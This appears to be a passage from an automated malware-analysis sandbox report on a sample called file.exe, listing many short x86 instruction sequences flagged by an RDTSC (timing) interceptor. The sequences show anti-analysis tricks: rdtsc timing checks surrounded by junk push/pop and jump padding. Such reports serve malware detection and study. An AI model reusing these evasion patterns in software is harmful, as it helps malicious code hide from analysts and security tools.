                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633DB4 second address: 633E32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F79113F0798h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 mov ecx, 45BDF078h 0x00000029 pushad 0x0000002a jnc 00007F79113F079Ch 0x00000030 popad 0x00000031 push 0000001Eh 0x00000033 push 00000000h 0x00000035 push ecx 0x00000036 call 00007F79113F0798h 0x0000003b pop ecx 0x0000003c mov dword ptr [esp+04h], ecx 0x00000040 add dword ptr [esp+04h], 00000015h 0x00000048 inc ecx 0x00000049 push ecx 0x0000004a ret 0x0000004b pop ecx 0x0000004c ret 0x0000004d clc 0x0000004e nop 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F79113F07A9h 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633E32 second address: 633E3C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F79111F4EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633E3C second address: 633E5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F79113F07A6h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633E5F second address: 633E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F79111F4EF6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6341AC second address: 6341BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79113F079Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6341BC second address: 6341C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6341C0 second address: 6341CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6341CF second address: 6341DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79111F4EFBh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B918 second address: 66B91D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BA65 second address: 66BA6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BBF4 second address: 66BBFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BBFA second address: 66BC00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BC00 second address: 66BC04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BC04 second address: 66BC25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F79111F4EFBh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 jng 00007F79111F4EF6h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BC25 second address: 66BC29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BC29 second address: 66BC43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F79111F4F02h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BC43 second address: 66BC4D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F79113F079Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BED1 second address: 66BEE0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jo 00007F79111F4EF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BEE0 second address: 66BEF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79113F07A0h 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BEF5 second address: 66BEFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BEFB second address: 66BEFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BEFF second address: 66BF1B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F79111F4F02h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BF1B second address: 66BF2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79113F079Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BF2C second address: 66BF30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BF30 second address: 66BF36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67AC93 second address: 67AC9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 679B7D second address: 679B81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 679B81 second address: 679B9E instructions: 0x00000000 rdtsc 0x00000002 js 00007F79111F4EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F79111F4F01h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 679B9E second address: 679BAA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F79113F0796h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67A135 second address: 67A139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67A139 second address: 67A13D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6796F3 second address: 6796F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6796F9 second address: 679708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jno 00007F79113F0796h 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 679708 second address: 67970E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67970E second address: 679712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 679712 second address: 679716 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67A6BF second address: 67A6C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67A6C5 second address: 67A6D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F79111F4EF6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67A6D0 second address: 67A6D5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67CE31 second address: 67CE4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a jnc 00007F79111F4EF6h 0x00000010 jmp 00007F79111F4EFBh 0x00000015 pop eax 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 680F81 second address: 680F85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 680F85 second address: 680FA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79111F4EFBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007F79111F4EF8h 0x00000014 pushad 0x00000015 popad 0x00000016 push ecx 0x00000017 push edi 0x00000018 pop edi 0x00000019 pushad 0x0000001a popad 0x0000001b pop ecx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 680FA7 second address: 680FBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79113F079Bh 0x00000007 jno 00007F79113F07A2h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 681273 second address: 68127B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68127B second address: 68127F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68127F second address: 681283 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 681283 second address: 681292 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F79113F0796h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68141F second address: 68142B instructions: 0x00000000 rdtsc 0x00000002 js 00007F79111F4EF6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6866AC second address: 6866CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79113F07A8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 686828 second address: 68682C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68682C second address: 686832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 686832 second address: 68684E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79111F4F02h 0x00000009 jnl 00007F79111F4EF6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68706E second address: 6870AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79113F07A3h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007F79113F07B1h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6870AE second address: 6870C6 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F79111F4F0Ah 0x00000008 jmp 00007F79111F4EFEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F3DB5 second address: 5F3DBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F3DBA second address: 5F3DC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F79111F4EF6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68D07E second address: 68D091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79113F079Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68D091 second address: 68D0A6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F79111F4EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b jp 00007F79111F4F25h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68D0A6 second address: 68D0B0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68D0B0 second address: 68D0B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68C97D second address: 68C99B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c jmp 00007F79113F07A2h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68C99B second address: 68C99F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68C99F second address: 68C9B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007F79113F0796h 0x00000010 js 00007F79113F0796h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68C9B5 second address: 68C9BF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F79111F4EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68C9BF second address: 68C9C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68CDAA second address: 68CDCA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 jmp 00007F79111F4F06h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 690D97 second address: 690D9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 690D9D second address: 690DC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79111F4F01h 0x00000007 jmp 00007F79111F4EFFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68FFFE second address: 690008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 690008 second address: 69002C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 jmp 00007F79111F4F00h 0x0000000e pop eax 0x0000000f ja 00007F79111F4EFEh 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69002C second address: 690030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6901A5 second address: 6901BD instructions: 0x00000000 rdtsc 0x00000002 jne 00007F79111F4EF6h 0x00000008 jp 00007F79111F4EF6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jnp 00007F79111F4EF6h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6901BD second address: 6901DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79113F07A9h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6901DC second address: 6901F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79111F4EFBh 0x00000007 pushad 0x00000008 jnp 00007F79111F4EF6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69047F second address: 690498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F79113F07A1h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 690498 second address: 69049E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69049E second address: 6904A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6904A4 second address: 6904A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6908F8 second address: 6908FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6908FE second address: 690932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79111F4F07h 0x00000009 popad 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007F79111F4EFDh 0x00000012 push eax 0x00000013 pop eax 0x00000014 popad 0x00000015 push edi 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 696D8B second address: 696D8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 696D8F second address: 696D9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 697055 second address: 697059 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 697321 second address: 697327 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6978AD second address: 6978B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6983DA second address: 6983DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6983DE second address: 6983E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6983E4 second address: 6983EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6983EA second address: 69840D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79113F07A9h 0x00000009 jg 00007F79113F0796h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69840D second address: 698411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69BC14 second address: 69BC18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69BC18 second address: 69BC2C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 js 00007F79111F4EF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007F79111F4EF6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69BC2C second address: 69BC30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69BC30 second address: 69BC3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F79111F4EF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69BC3C second address: 69BC5E instructions: 0x00000000 rdtsc 0x00000002 jo 00007F79113F07ACh 0x00000008 jmp 00007F79113F07A6h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69BC5E second address: 69BC64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69BC64 second address: 69BC68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69BC68 second address: 69BC6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69BC6E second address: 69BC89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F79113F079Dh 0x00000012 pop esi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69BDC5 second address: 69BDCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69C08C second address: 69C098 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69C098 second address: 69C09E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
